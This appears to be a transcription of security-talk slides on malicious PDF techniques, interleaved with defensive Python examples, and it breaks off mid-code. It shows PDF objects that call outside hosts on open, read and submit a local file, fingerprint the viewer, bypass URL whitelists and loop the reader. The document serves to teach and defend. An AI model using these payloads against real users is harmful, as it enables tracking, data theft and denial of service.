Filtering protocols: the theory

Adobe Reader firewall
- Protocols are filtered based on schemes
  - Ex.: http, ssh, rlogin, telnet, file, ...
- A blacklist is defined in HKLM\SOFTWARE\Policies\Adobe\Acrobat Reader\9.0\FeatureLockDown\cDefaultLaunchURLPerms
- No option in the GUI or user configuration file to change that
- But a user can add his own option manually in HKCU
  - If http:// is added to the whitelist, no warning is ever prompted again when an HTTP connection is made!


Filtering protocols: the real life

Adobe Reader firewall: Reader prompts the user to connect to a chrome address (Mozilla XUL interface).

Bypassing the blacklisting of the PDF proxy
- Whitelisted schemes have precedence over blacklisted hostnames!
- Short-circuits the security configuration of the GUI

Signed PDF

PDF digital signature howto
- A PDF document can be digitally signed
- The whole document has to be signed for the signature to be accepted
- Embeds an X.509 certificate or a PKCS#7 envelope, together with the document signature
- The signature is validated by the reader at opening


Inside Digital Signature

DigSig howto
- Filter and SubFilter define the signature scheme
- Contents contains the signature itself
- ByteRange specifies what part of the file is signed
  - Must include everything but Contents, from start to end of the file

2 0 obj
<< /Type /Sig
   /SubFilter /adbe.pkcs7.detached
   /Contents <...>
   /ByteRange [ 0 660 4818 1050 ] >>
endobj
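The ByteRange rule above, "everything but Contents, from start to end of the file", is mechanical enough to check before any cryptography is done. This added Python example (not code from the talk or from Adobe Reader's verifier) reads /ByteRange and /Contents from a file, checks that the first range starts at byte 0, that the two ranges meet exactly at the boundaries of the /Contents hex string, and that the second range reaches the end of the file, and returns the SHA-256 of the covered bytes. It does not parse or verify the PKCS#7 blob itself; the file layout, the zeroed placeholder where the signature would sit, and the appended update used in the test are all constructed.

```python
import hashlib
import re

BYTERANGE_RE = re.compile(rb"/ByteRange\s*\[\s*(\d+)\s+(\d+)\s+(\d+)\s+(\d+)\s*\]")
CONTENTS_RE = re.compile(rb"/Contents\s*(<[0-9A-Fa-f\s]*>)")


def check_byte_range(pdf):
    """Verify that /ByteRange covers the whole file except the /Contents hex string,
    and return the digest of exactly the bytes the signature is supposed to cover."""
    br, ct = BYTERANGE_RE.search(pdf), CONTENTS_RE.search(pdf)
    if not br or not ct:
        raise ValueError("no /ByteRange or /Contents found")
    s1, l1, s2, l2 = (int(g) for g in br.groups())
    problems = []
    if s1 != 0:
        problems.append("signed range does not start at byte 0")
    if s1 + l1 != ct.start(1):
        problems.append("first range does not stop exactly at /Contents")
    if s2 != ct.end(1):
        problems.append("second range does not resume right after /Contents")
    if s2 + l2 < len(pdf):
        problems.append("%d bytes after the signed range are not covered" % (len(pdf) - s2 - l2))
    elif s2 + l2 > len(pdf):
        problems.append("ByteRange extends past the end of the file")
    signed = pdf[s1:s1 + l1] + pdf[s2:s2 + l2]
    return {"ok": not problems, "problems": problems, "sha256": hashlib.sha256(signed).hexdigest()}


def make_sample(appended=b""):
    """Constructed signed-layout file with a zeroed placeholder where the PKCS#7 blob
    would go; the fixed-width ByteRange fields are filled in once the offsets are known."""
    prefix = (b"%%PDF-1.1\n1 0 obj << /Type /Catalog /Pages 3 0 R >> endobj\n"
              b"2 0 obj << /Type /Sig /SubFilter /adbe.pkcs7.detached "
              b"/ByteRange [0 %010d %010d %010d] /Contents ")
    gap = b"<" + b"00" * 32 + b">"                      # placeholder signature, excluded from the ranges
    suffix = b" >> endobj\ntrailer << /Root 1 0 R >>\n%%EOF\n"
    a = len(prefix % (0, 0, 0))                          # width is fixed, so offsets do not move
    return prefix % (a, a + len(gap), len(suffix)) + gap + suffix + appended


if __name__ == "__main__":
    print(check_byte_range(make_sample()))
    print(check_byte_range(make_sample(b"4 0 obj << /OpenAction 5 0 R >> endobj\n%%EOF\n")))
```

The second call shows why the rule matters: after an update is appended to the file the digest of the covered bytes is unchanged, so the cryptographic signature would still verify, while the appended objects are simply outside what was signed. A verifier that reports "valid" without also checking that the ranges reach the end of the file is describing a different document than the one the user sees.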


More trust with PDF certification

Certification
- A signed document can be passed into another digest/signature process, leading to a certified document
- Different trust properties can be set on certified documents
- Properties: can have dynamic content, can execute privileged JavaScript, ...

Adobe Reader store
- User-trusted (and CA root) certificates are saved in the Adobe certificate store
- This store is a file located in the user configuration folders
- Security policy is defined at the user level!!!


Certificate storage

Adobe Reader store file format
- Location: <conf folder>/Security/addressbook.acrodata
- As it is user-writable, one could inject a malicious certificate!
- Structure very close to PDF: header, body with objects, xref, trailer
- Each certificate is stored in a dictionary object:

<< /ABEType 1            # 1 stands for a certificate
   /Cert (...)           # DER-encoded certificate string
   /ID 1001              # unique value used to reference this certificate
   /Editable false       # can be edited in the GUI panel
   /Viewable false       # appears in the GUI panel
   /Trust 8190 >>        # rights to give to certified documents


Usage rights

What are they?
- Usage rights are used to enable additional interactive features that are not available by default in a particular viewer application (such as Adobe Reader)
- The document must be signed
- Annots: Create, Delete, Modify, Copy, Import, Export
  - Online: upload or download markup annotations from a server
- Form: Fillin (save), Import, Export, SubmitStandalone
  - Online: permits the use of forms-specific online mechanisms such as SOAP or Active Data Object


Gaining usage rights

How to get them the Adobe way?
- Usage rights are granted by Adobe Pro and so on (Adobe's non-free software)
- Documents with usage rights must be certified by Adobe
- Adobe's certificate is provided in the certificate store
- Exercise: where can Adobe's private key, the one used to sign the documents, be?


Thinking malicious PDF

Thinking like an attacker
- I want to be invisible: evasion tricks
- I want to kill PDF files and/or the Reader: denial of service
- I want to steal information (read + send): information leakage
- I want to corrupt my target: egg dropping
- I want to overrun the target: code execution


Encryption with PDF

Data protection
- Uses RC4 or AES symmetric algorithms
- Only string and stream objects are encrypted
- Other objects are considered part of the file structure, not document contents
- Prompts for the user key in order to read the original document


Natural polymorphism with PDF

Obfuscating a PDF file
- Strings (thus keywords) can be encoded in many ways
- Objects can appear in the file in any order
- Objects can be split into many objects referring to each other
- Streams can be compressed with many cascaded algorithms
- Strings can be written in different ways: ASCII, octal, hexadecimal, and in different charsets
- PDF objects can be embedded into a compressed stream object
- A PDF file can be split into many files referring to each other
- A PDF file can be embedded into another PDF file


Semantic polymorphism: many to one

Trigger an action when a PDF is opened
- OpenAction: put in the PDF catalog
- Register an Additional Action (AA) on the first page
- Register an Additional Action (AA) on page n, and set the first displayed page to be this one
- Using Requirement Handlers (RH): checks are based on a JavaScript run when the PDF is opened
- ...
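The two slides above (keyword encodings, then the several ways to fire an action at open time) are why grepping a PDF for "/JavaScript" or "/OpenAction" is unreliable. The Python below is an added example written for this edit, not code from the slides or from the Origami toolkit: it undoes the three encodings the slides list (#xx escapes in names, hex strings, octal escapes in literal strings) and only then counts the open-time triggers and action types a defender watches for. The sample file bytes are constructed for the example and the function names are chosen here.

```python
import re

# Constructed sample: a minimal PDF whose keywords are hidden with the encodings
# the slides list (#xx name escapes, a hex string, an octal escape in a string).
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /Open#41ction 4 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R\n"
    b"   /AA << /O << /S /J#61vaScript /JS <6170702E616C657274283129> >> >> >> endobj\n"
    b"4 0 obj << /S /Launch /F (c\\141lc.exe) >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

# Keys that make something happen at open time, plus the action types that
# reach outside the document. Matched only after normalisation.
WATCHED_KEYS = [b"/OpenAction", b"/AA", b"/Requirements", b"/RH", b"/JavaScript",
                b"/Launch", b"/SubmitForm", b"/ImportData", b"/URI", b"/GoToR",
                b"/GoToE", b"/Named"]

NAME_TOKEN = re.compile(rb"/([^\s/\[\]<>(){}%]+)")
HEX_STRING = re.compile(rb"<([0-9A-Fa-f\s]*)>")
LITERAL_STRING = re.compile(rb"\(((?:[^()\\]|\\.)*)\)", re.S)


def decode_names(data: bytes) -> bytes:
    """Resolve #xx escapes inside name tokens: /J#61vaScript -> /JavaScript."""
    def fix(m):
        raw = re.sub(rb"#([0-9A-Fa-f]{2})",
                     lambda h: bytes([int(h.group(1), 16)]), m.group(1))
        return b"/" + raw
    return NAME_TOKEN.sub(fix, data)


def decode_hex_strings(data: bytes) -> bytes:
    """Rewrite <48656C6C6F> hex strings as (Hello) literal strings."""
    def fix(m):
        digits = re.sub(rb"\s+", b"", m.group(1))
        if len(digits) % 2:          # PDF pads a trailing odd digit with 0
            digits += b"0"
        return b"(" + bytes.fromhex(digits.decode("ascii")) + b")"
    return HEX_STRING.sub(fix, data)


def decode_literal_strings(data: bytes) -> bytes:
    """Resolve \\ddd octal escapes in (...) strings. Strings with nested
    parentheses are left alone, which is good enough for keyword matching."""
    def fix(m):
        body = re.sub(rb"\\([0-7]{1,3})",
                      lambda o: bytes([int(o.group(1), 8) & 0xFF]), m.group(1))
        return b"(" + body + b")"
    return LITERAL_STRING.sub(fix, data)


def normalize(data: bytes) -> bytes:
    """Apply the three decoders so differently encoded keywords compare equal."""
    return decode_literal_strings(decode_hex_strings(decode_names(data)))


def keyword_counts(data: bytes, normalized: bool = True) -> dict:
    """Count watched keys; normalized=False shows what a naive grep would see."""
    text = normalize(data) if normalized else data
    counts = {}
    for key in WATCHED_KEYS:
        n = len(re.findall(re.escape(key) + rb"(?![A-Za-z])", text))
        if n:
            counts[key.decode("ascii")] = n
    return counts


if __name__ == "__main__":
    print("raw grep   :", keyword_counts(SAMPLE_PDF, normalized=False))
    print("normalized :", keyword_counts(SAMPLE_PDF))
```

On the constructed sample the raw grep sees only /AA and /Launch; after normalisation the /OpenAction and /JavaScript keys, the hex-encoded app.alert call and the octal-escaped calc.exe path all become visible. A detection rule that runs before a step like this can be dodged by any of the encodings the slide lists.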


What's this file? PDF? JPG? ...

Double view: PDF in JPG
- A JPG header is built from sections
- Each section starts with 0xFF 0xXX, where byte XX tells the kind of section
- You can put comments in JPG files: section 0xFF 0xFE

Layout (from the slide's figure):
  SOI                  FF D8
  JFIF                 FF E0 XX XX .... XX
  Other JPG sections
  Comment              FF FE XX XX ... ...


What's this file? PDF? COM? ...

Double view: PDF in COM
- COM (DOS 16-bit executable) has no header
- Contains raw code executed from the first byte
- The entry point jumps around the PDF code

pdf.asm
    .model tiny
    .code
    .startup
        jmp start
    pdffile db "%PDF-1.1", 13, 10, ...
    start:
        <instructions>
        ...
    end
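Both double views above rely on the same reader behaviour: a PDF parser accepts a "%PDF-" header that is not at offset 0, while the JPEG or DOS loader never looks past its own structure. The Python below is an added example for this edit, not code from the slides: it walks the JPEG marker segments, reports a PDF header hidden in a COM (0xFFFE) segment, and flags any file whose PDF header sits behind a foreign prefix, which also covers the COM-executable case. The sample JPEG skeleton is constructed (no real image data) and the function names are chosen here.

```python
import re

JPEG_SOI = b"\xff\xd8"
PDF_HEADER = re.compile(rb"%PDF-\d\.\d")


def build_sample_polyglot() -> bytes:
    """Constructed sample: a JPEG skeleton (SOI, APP0, COM, EOI) whose COM
    segment carries a tiny PDF. No image data is included."""
    app0 = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    pdf = b"%PDF-1.1\n1 0 obj << /Type /Catalog >> endobj\ntrailer << /Root 1 0 R >>\n%%EOF\n"
    seg_app0 = b"\xff\xe0" + (len(app0) + 2).to_bytes(2, "big") + app0
    seg_com = b"\xff\xfe" + (len(pdf) + 2).to_bytes(2, "big") + pdf
    return JPEG_SOI + seg_app0 + seg_com + b"\xff\xd9"


def jpeg_segments(data: bytes):
    """Yield (marker, payload) for each length-prefixed JPEG segment until the
    scan data (SOS) or end of image (EOI) is reached."""
    if not data.startswith(JPEG_SOI):
        return
    pos = 2
    while pos + 2 <= len(data) and data[pos] == 0xFF:
        marker = data[pos + 1]
        if marker == 0xFF:                               # fill byte before a marker
            pos += 1
            continue
        if marker in (0xD9, 0xDA):                       # EOI or SOS: stop walking
            return
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:     # TEM / RSTn carry no length
            pos += 2
            continue
        if pos + 4 > len(data):
            return
        length = int.from_bytes(data[pos + 2:pos + 4], "big")
        yield marker, data[pos + 4:pos + 2 + length]
        pos += 2 + length


def pdf_header_offsets(data: bytes, window: int = 1024) -> list:
    """Offsets of a PDF header in the first `window` bytes. Readers tolerate a
    header that is not at offset 0, which is what makes these polyglots work."""
    return [m.start() for m in PDF_HEADER.finditer(data[:window])]


def classify(data: bytes) -> dict:
    """Report whether the bytes carry a PDF header, whether they parse as JPEG,
    and whether the PDF sits in a JPEG comment or behind a foreign prefix."""
    offsets = pdf_header_offsets(data)
    report = {"pdf_header_offsets": offsets, "jpeg": data.startswith(JPEG_SOI),
              "pdf_in_jpeg_comment": False}
    if report["jpeg"]:
        for marker, payload in jpeg_segments(data):
            if marker == 0xFE and PDF_HEADER.search(payload):
                report["pdf_in_jpeg_comment"] = True
    # A lone PDF header at offset 0 is a plain PDF; anything else that still
    # carries a header is a file two parsers will disagree about.
    report["polyglot"] = bool(offsets) and (report["jpeg"] or offsets[0] != 0)
    return report


if __name__ == "__main__":
    print(classify(build_sample_polyglot()))
    print(classify(b"\xeb\x20%PDF-1.1\r\n"))   # COM-style: code before the header
```

The practical rule this encodes: decide a file's type by what every candidate parser would make of it, not by its first two bytes or by its extension. A gateway that only checks for "%PDF-" at offset 0 lets the JPEG polyglot through as an image, while the viewer happily renders it as a document.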


Bombing PDF

zip bomb
- Streams can be compressed (zlib)
- What happens when many, many, many 0s are compressed? ;-)

4 0 obj
<< /Filter /FlateDecode /Length 486003 >>
stream
...
endstream
endobj
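The /Length above is the compressed size; nothing in the object says how large the stream becomes once inflated. The Python below is an added example for this edit, not code from the slides: it builds a FlateDecode body of the kind the slide describes (many zero bytes) and shows the bounded inflation a viewer or scanner should use, which stops on an absolute output cap or on a maximum expansion ratio, whichever is hit first. The limits and function names are chosen here.

```python
import zlib


class DecompressionLimit(Exception):
    """Raised when a stream would inflate past the configured budget."""


def make_flate_bomb(size: int = 8 * 1024 * 1024) -> bytes:
    """Constructed sample: the compressed body of a /FlateDecode stream holding
    `size` zero bytes (deflate gets close to its ~1000:1 ceiling on this input)."""
    return zlib.compress(b"\x00" * size, 9)


def safe_inflate(compressed: bytes, max_output: int = 1 << 20, max_ratio: int = 100) -> bytes:
    """Inflate in bounded chunks and stop as soon as the output would exceed
    either an absolute size or a multiple of the input size."""
    budget = min(max_output, max_ratio * max(len(compressed), 1))
    inflater = zlib.decompressobj()
    out = bytearray()
    pending = compressed
    while pending:
        piece = inflater.decompress(pending, 64 * 1024)   # at most 64 KiB per call
        out += piece
        if len(out) > budget:
            raise DecompressionLimit(
                f"{len(compressed)} input bytes would inflate past {budget} bytes")
        if not piece and inflater.unconsumed_tail == pending:
            break                                          # no progress: corrupt input
        pending = inflater.unconsumed_tail                 # input not yet consumed
    out += inflater.flush()
    if len(out) > budget:
        raise DecompressionLimit(f"final flush pushed output past {budget} bytes")
    return bytes(out)


def is_flate_bomb(compressed: bytes, **limits) -> bool:
    """True when the stream trips the limits instead of inflating cleanly."""
    try:
        safe_inflate(compressed, **limits)
    except DecompressionLimit:
        return True
    return False


if __name__ == "__main__":
    bomb = make_flate_bomb()
    print(f"{len(bomb)} compressed bytes, bomb={is_flate_bomb(bomb)}")
```

The ratio limit matters more than the absolute one: a scanner that inflates every stream into memory with a single zlib.decompress() call is the process the slide's stream takes down, and a fixed cap alone still lets an attacker pack thousands of just-under-the-cap streams into one file.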


Killing PDF with Named

Moebius: going to the next page
- The Named action is used to put labels and jump to them across documents
- Some labels/destinations are predefined

/AA <<                 % Page object: Additional Action
   /O <<               % When the page is opened
      /S /Named        % Perform an action of type Named
      /N /NextPage     % Action name is NextPage
   >>
>>


Killing PDF with GoTo

Moebius: jumping around
- The GoTo action changes the view to the specified destination
- The destination is either inside the doc, embedded in the doc (GoToE) or remote (GoToR)
- Variant: randomize the jumps

1656 0 obj                  % Page object
<< /AA <<                   % Additional Action
      /O <<                 % When the page is opened
         /S /GoTo           % Perform an action of type GoTo
         /D [1 0 R /Fit]    % Destination is object 1, with its content magnified to fit the window
      >>
   >>
>>


Killing PDFs with GoToR

Moebius: going to the next document
- The GoToR action sets the view to another document
- Can be opened in a new window

In one document:
/AA << /O << /S /GoToR /F (moebius-gotor-2.pdf) /D [0 /Fit] /NewWindow false >> >>

In the other:
/AA << /O << /S /GoToR /F (moebius-gotor-1.pdf) /D [0 /Fit] /NewWindow false >> >>
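The three Moebius slides (Named /NextPage, GoTo, GoToR) are the same denial of service: page-open actions that form a cycle the viewer can never leave. The Python below is an added example for this edit, not code from the slides: it extracts the /O (page-open) action of every page, follows the chain from the first page of a starting document, across documents for GoToR, and reports the first (document, page) visited twice. The sample documents are constructed to mirror the slides' moebius files and contain only the objects the walk needs; the function names are chosen here.

```python
import re

# Constructed sample documents, modelled on the slides' moebius files: each holds
# just the objects the walk needs (page tree and pages with /AA /O actions).
DOCS = {
    "moebius-gotor-1.pdf": b"""
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /AA << /O << /S /GoToR /F (moebius-gotor-2.pdf) /D [0 /Fit] /NewWindow false >> >> >> endobj
""",
    "moebius-gotor-2.pdf": b"""
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /AA << /O << /S /GoToR /F (moebius-gotor-1.pdf) /D [0 /Fit] /NewWindow false >> >> >> endobj
""",
    "moebius-named.pdf": b"""
2 0 obj << /Type /Pages /Kids [3 0 R 4 0 R] /Count 2 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /AA << /O << /S /Named /N /NextPage >> >> >> endobj
4 0 obj << /Type /Page /Parent 2 0 R /AA << /O << /S /GoTo /D [3 0 R /Fit] >> >> >> endobj
""",
    "benign.pdf": b"""
2 0 obj << /Type /Pages /Kids [3 0 R 4 0 R] /Count 2 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /AA << /O << /S /GoTo /D [4 0 R /Fit] >> >> >> endobj
4 0 obj << /Type /Page /Parent 2 0 R >> endobj
""",
}

OBJ = re.compile(rb"(\d+)\s+0\s+obj(.*?)endobj", re.S)
OPEN_ACTION = re.compile(rb"/AA\s*<<\s*/O\s*<<(.*?)>>", re.S)   # assumes a flat action dict


def page_kids(doc: bytes) -> list:
    """Page object numbers in display order, from the /Pages node's /Kids."""
    m = re.search(rb"/Type\s*/Pages\b.*?/Kids\s*\[([^\]]*)\]", doc, re.S)
    return [int(n) for n in re.findall(rb"(\d+)\s+0\s+R", m.group(1))] if m else []


def open_actions(doc: bytes) -> dict:
    """Map page object number -> parsed /O (page-open) action, if it has one."""
    actions = {}
    for num, body in OBJ.findall(doc):
        if not re.search(rb"/Type\s*/Page\b", body):
            continue
        m = OPEN_ACTION.search(body)
        if not m:
            continue
        act = m.group(1)
        kind = re.search(rb"/S\s*/(\w+)", act).group(1).decode()
        if kind == "GoTo":
            actions[int(num)] = ("GoTo", int(re.search(rb"/D\s*\[\s*(\d+)\s+0\s+R", act).group(1)))
        elif kind == "GoToR":
            target = re.search(rb"/F\s*\(([^)]*)\)", act).group(1).decode()
            index = int(re.search(rb"/D\s*\[\s*(\d+)", act).group(1))   # page index in target
            actions[int(num)] = ("GoToR", target, index)
        elif kind == "Named":
            actions[int(num)] = ("Named", re.search(rb"/N\s*/(\w+)", act).group(1).decode())
        else:
            actions[int(num)] = (kind,)
    return actions


def open_action_walk(docs: dict, start: str, max_steps: int = 100) -> dict:
    """Follow page-open actions from the first page of `start`; report the first
    (document, page) seen twice, i.e. a loop the viewer cannot escape."""
    kids = {name: page_kids(text) for name, text in docs.items()}
    acts = {name: open_actions(text) for name, text in docs.items()}
    node = (start, kids[start][0])
    chain = []
    while node not in chain and len(chain) < max_steps:
        chain.append(node)
        doc, page = node
        act = acts[doc].get(page)
        if act is None:
            return {"chain": chain, "loop_at": None}
        if act[0] == "GoTo":
            node = (doc, act[1])
        elif act[0] == "GoToR" and act[1] in docs and act[2] < len(kids[act[1]]):
            node = (act[1], kids[act[1]][act[2]])
        elif act[0] == "Named" and act[1] == "NextPage":
            i = kids[doc].index(page)
            if i + 1 >= len(kids[doc]):
                return {"chain": chain, "loop_at": None}
            node = (doc, kids[doc][i + 1])
        else:
            return {"chain": chain, "loop_at": None}
    return {"chain": chain, "loop_at": node if node in chain else None}


def has_open_action_loop(docs: dict, start: str) -> bool:
    return open_action_walk(docs, start)["loop_at"] is not None
```

For a single document the walk needs only that file; for the GoToR pair the second file must be present (the slides open it from the same directory), which is why the checker takes a dictionary of documents. A viewer that keeps a per-session budget of automatic navigations, or refuses to fire a page-open action that targets a page already visited by another page-open action, breaks all three loops the same way this walk detects them.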


Hide and seek

Hiding text... or not
- Every viewed item is a PDF object
- These objects can be manipulated... or removed
- Or simply copy/paste...
- As long as the PDF is not encrypted, there is no way to prevent reading

Calipari
- 4 March 2005: an Italian secret agent is killed in Iraq by US soldiers
- Later, an unclassified report was released: much text and many names are hidden... ;-)


Incremental PDF

Back into the past: revisions
- Not so long ago, MS Office used incremental saves
  - Easy to rebuild the previous version of a doc
- Nowadays, PDF documents work the same (sigh)
- Do not update PDF files to conceal sensitive information

Figure (layout of an incrementally updated file): Header; Body 0, Cross Ref. 0, Trailer 0; Body 1, Cross Ref. 1, Trailer 1
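The layout above is the whole story: an incremental save appends a new body, cross-reference section and trailer, so every %%EOF marker in the file is the end of a complete earlier revision. The Python below is an added example for this edit, not code from the slides: it splits a file at its %%EOF markers, reports which object numbers were redefined by later revisions, and hands back the superseded bodies, which is the check a reviewer runs on a document before treating a redaction as real. The sample file is constructed (its xref offsets are placeholders, not computed) and the function names are chosen here.

```python
import re

# Constructed sample: a one-page PDF saved twice. The second save appends a new
# body for object 4 (the page content) instead of rewriting the file, so the
# first body is still on disk. The xref offsets are placeholders, not computed.
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R /Contents 4 0 R >> endobj\n"
    b"4 0 obj << /Length 56 >> stream\n"
    b"BT /F1 12 Tf (Agent name: John Doe, Rome station) Tj ET\n"
    b"endstream endobj\n"
    b"xref\n0 5\ntrailer << /Root 1 0 R /Size 5 >>\nstartxref\n0\n%%EOF\n"
    # ---- incremental update: only the changed object, a new xref and trailer ----
    b"4 0 obj << /Length 44 >> stream\n"
    b"BT /F1 12 Tf (Agent name: [REDACTED]) Tj ET\n"
    b"endstream endobj\n"
    b"xref\n0 1\ntrailer << /Root 1 0 R /Size 5 /Prev 0 >>\nstartxref\n0\n%%EOF\n"
)

EOF_MARK = re.compile(rb"%%EOF\r?\n?")
OBJ = re.compile(rb"(\d+)\s+\d+\s+obj\s*(.*?)endobj", re.S)


def revisions(data: bytes) -> list:
    """Each revision is the file truncated at one of its %%EOF markers; the
    first entry is the document as it was before any update."""
    return [data[:m.end()] for m in EOF_MARK.finditer(data)]


def new_objects(data: bytes) -> list:
    """(revision index, object number, body) for every object body, in file order."""
    out, prev_end = [], 0
    for index, rev in enumerate(revisions(data)):
        for num, body in OBJ.findall(rev[prev_end:]):
            out.append((index, int(num), body.strip()))
        prev_end = len(rev)
    return out


def object_history(data: bytes) -> dict:
    """Object number -> revision indexes in which a body for it was written.
    Any object with more than one entry was changed by an update."""
    history = {}
    for index, num, _ in new_objects(data):
        history.setdefault(num, []).append(index)
    return history


def superseded_bodies(data: bytes) -> dict:
    """Object number -> earlier bodies that a later revision replaced but that
    are still recoverable from the file bytes."""
    bodies = {}
    for _, num, body in new_objects(data):
        bodies.setdefault(num, []).append(body)
    return {n: b[:-1] for n, b in bodies.items() if len(b) > 1}


if __name__ == "__main__":
    print("revisions:", len(revisions(SAMPLE_PDF)))
    print("history  :", object_history(SAMPLE_PDF))
    for num, old in superseded_bodies(SAMPLE_PDF).items():
        print(f"object {num} earlier body:", old[0][:80])
```

To publish a document without its history, rewrite it as a single revision (a "save as" that regenerates the file, or a tool that rebuilds it from the live objects) and verify with a check like this that exactly one %%EOF remains; saving over the original only appends, as the slide warns.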


What information to leak?

Help me JavaScript, you are my only hope!

AddKeyValuePair("platform", app.platform);
AddKeyValuePair("formsversion", app.formsVersion);
AddKeyValuePair("language", app.language);
AddKeyValuePair("viewerType", app.viewerType);
AddKeyValuePair("viewerVariation", app.viewerVariation);
AddKeyValuePair("viewerVersion", app.viewerVersion);
AddKeyValuePair("url", this.URL);
AddKeyValuePair("external", this.external);

var plugins = app.plugIns;   // the slide does not show where `plugins` comes from; app.plugIns is assumed
for (var i = 0; i < plugins.length; i++) {
    AddKeyValuePair("plugin" + (i+1) + "name", plugins[i].name);
    AddKeyValuePair("plugin" + (i+1) + "version", plugins[i].version);
    AddKeyValuePair("plugin" + (i+1) + "certified", plugins[i].certified);
    AddKeyValuePair("plugin" + (i+1) + "loaded", plugins[i].loaded);
}

var pn = app.printerNames;


What to leak? External streams

PDF mantra
- All content in a PDF had to be contained inside the single PDF file
- At most, a PDF file can access only PDF/FDF files
- But starting from PDF 1.2, the raw data of streams can be outside the PDF file...
- Initially for images, sounds, videos... but it works for all streams (yes, also JavaScript programs :)


What to leak? External streams

Breaking the mantra
- Preview, Foxit, poppler: nothing happens
- Adobe Reader 7, 8: off by default, enabled through the Trust manager
- Adobe Reader 9: option no longer available

6 0 obj
<< /Length 0 /F << /FS /URL /F (http://seclabs.org/fred/script.js) >> >>
stream
endstream
endobj

4 0 obj
<< /S /JavaScript /JS 6 0 R >>
endobj


External streams: the revenge of real life

Breaking the mantra... again: accessing any kind of document
- Define many embedded file attachments, each stream content being external
- Use JavaScript to:
  - Access (open/read) each embedded file
  - Submit each embedded file through an invisible form

1 0 obj
<< /Type /Catalog /Names << /JavaScript 2 0 R /EmbeddedFiles 6 0 R >> >>
endobj
6 0 obj
<< /EF << /F 9 0 R >> /F (secret.doc) /Type /Filespec >>
endobj
9 0 obj
<< /Length 0 /F (secret.doc) >>
stream
endstream
endobj

// JavaScript to read, and transform, any kind of file
var stream = this.getDataObjectContents("secret.doc");
var data = util.stringFromStream(stream, "utf-8");

Webbug: when Reader interacts with your browser

Webbug: make your browser go to the Internet
- poppler, Preview: nothing happens
- Adobe Reader: a pop-up asking whether the connection is allowed
- Foxit: no pop-up, the connection is made...

1 0 obj
<< /Type /Catalog
   /OpenAction <<                                        % When the document is opened
      /S /URI                                            % Action type is to resolve a URI
      /URI (http://seclabs.org/fred/webbug-browser.html)
   >>
   /Pages 2 0 R
>>


Webbug: when Reader interacts with your browser... again

Webbug: make your browser go to the Internet... again
- Add a JavaScript in the Names dictionary: it is automatically run when the document is opened
- Results are the same as with URI
- Remember polymorphism: it is also semantically true

1 0 obj
<< /Pages 3 0 R /Names << /JavaScript 2 0 R >> /Type /Catalog >>

2 0 obj
<< /Names [(Update) 4 0 R] >>

4 0 obj
<< /JS (app.launchURL("http://seclabs.org/fred/webbug-reader.php")) /S /JavaScript >>
endobj


Webbug and whitelist

Reader security model
- If this site is allowed, no more alerts will ever be raised

# ~/.adobe/Acrobat/8.0/Preferences/reader_prefs
/TrustManager [/c << /DefaultLaunchURLPerms [/c << /HostPerms [/t (version:1|seclabs.org:2)] >>] >>]


A few words about PDF forms

Forms in PDF (what for???)
- Adobe Reader comes with an embedded browser
- It is used to handle forms...
- 4 kinds of fields: Button, Text, Choice, Signature
- 4 actions are available through PDF forms: Submit, Reset, ImportData, JavaScript
- Forms in PDF are the same as forms on the web (except they are described with PDF objects)

Question: how is the Reader able to submit a form?
- FDF: Forms Data Format
- Very similar to PDF, but simpler
- Allows form initialisation, data exchange, ...

Webbug: when Reader calls home

Webbug: using the Reader's embedded browser
- Create a form, submitted as soon as the document is opened
- The server answers with another PDF document (e.g.)
- Reader handles this new document
- poppler, Preview, Foxit: nothing happens
- Adobe Reader: pop-up, but the new document is handled

1 0 obj
<< /OpenAction <<                                                      % When the document is opened
      /S /SubmitForm                                                   % Perform a SubmitForm action
      /F << /F (http://seclabs.org/fred/webbug-reader.php) /FS /URL >> % Connecting to this site
      /Fields []                                                       % Passing these arguments
      /Flags 12                                                        % Using an HTTP GET method
   >>
   /Pages 2 0 R
   /Type /Catalog
>>
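The external-stream and webbug slides together show five different PDF features that make the viewer (or the browser it hands off to) contact a server: external streams (/FS /URL), /URI actions, document-level JavaScript calling app.launchURL, GoToR, and /SubmitForm. The Python below is an added example for this edit, not code from the slides: it lists every object carrying an outbound URL, which of those mechanisms it uses, what component carries the request, and whether the same object wires it to an automatic trigger. The sample objects are constructed (c2.example is a placeholder host in the reserved .example domain) and the function names are chosen here.

```python
import re

# Constructed sample: one object for each way the slides show a document reaching
# the network. c2.example is a placeholder host (the .example TLD is reserved).
SAMPLE_PDF = b"""
1 0 obj << /Type /Catalog /Pages 5 0 R /Names << /JavaScript 2 0 R >>
  /OpenAction << /S /SubmitForm /F << /F (http://c2.example/collect.php) /FS /URL >> /Fields [] /Flags 12 >> >> endobj
2 0 obj << /Names [(Update) 4 0 R] >> endobj
4 0 obj << /S /JavaScript /JS (app.launchURL("http://c2.example/beacon.html")) >> endobj
6 0 obj << /Length 0 /F << /FS /URL /F (http://c2.example/script.js) >> >> stream
endstream endobj
7 0 obj << /Type /Annot /Subtype /Link /A << /S /URI /URI (http://c2.example/webbug.html) >> >> endobj
8 0 obj << /Type /Page /Parent 5 0 R /AA << /O << /S /GoToR /F (http://c2.example/next.pdf) /D [0 /Fit] >> >> >> endobj
"""

OBJ = re.compile(rb"(\d+)\s+\d+\s+obj(.*?)endobj", re.S)
URL = re.compile(rb"https?://[^\s()\"'>]+")

# (pattern, label, what carries the request), most specific first.
MECHANISMS = [
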